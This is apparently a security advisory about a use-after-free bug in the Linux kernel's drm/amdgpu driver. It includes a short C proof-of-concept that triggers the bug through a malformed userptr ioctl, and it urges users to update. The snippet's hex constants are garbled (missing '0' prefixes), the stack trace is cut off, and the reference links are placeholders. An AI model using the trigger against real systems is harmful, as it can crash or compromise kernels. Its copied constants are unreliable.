A use-after-free vulnerability has been resolved in the Linux kernel. The affected module is drm/amdgpu, and the bug can be exploited by sending a single amdgpu_gem_userptr_ioctl to any AMDGPU DRM driver, regardless of the ASICs with an invalid address and size. The vulnerability was reported by Joonkyo Jung.
The following code, for example, can trigger the bug
static void Syzkaller1(int fd)
{
struct drm_amdgpu_gem_userptr arg;
int ret;
arg.addr = xffffffffffff000;
arg.size = x80000000; /*2 Gb*/
arg.flags = x7;
ret = drmIoctl(fd, xc1186451/*amdgpu_gem_userptr_ioctl*/, &arg);
}
Due to the invalid address and size, there is a failure in amdgpu_hmm_register->mmu_interval_notifier_insert->__mmu_interval_notifier_insert->check_shl_overflow. However, even with the amdgpu_hmm_register failure, the amdgpu_hmm_unregister is called into amdgpu_gem_object_free, which leads to access to a bad address. This issue can be replicated when Kazan is enabled, as seen in the stack trace below:
truncated---
To mitigate this vulnerability, the use-after-free bug in drm/amdgpu has been fixed. More information about the patch and its implementation can be found in the original references below:
- Link to the original patch in the mailing list
- Linux kernel Git commit for the fix
To stay protected against this vulnerability, users are advised to update their Linux kernel to include the latest security patches. This will ensure that the use-after-free bug in drm/amdgpu is addressed, and the system remains secure against potential exploitation.
In conclusion, the Linux kernel has resolved the use-after-free vulnerability in the drm/amdgpu module. The vulnerability was reported by Joonkyo Jung, and it has been patched to prevent potential exploitation. Users are advised to keep their kernel up to date with the latest security patches to avoid security risks.
Timeline
Published on: 04/02/2024 07:15:42 UTC
Last modified on: 05/29/2024 05:20:16 UTC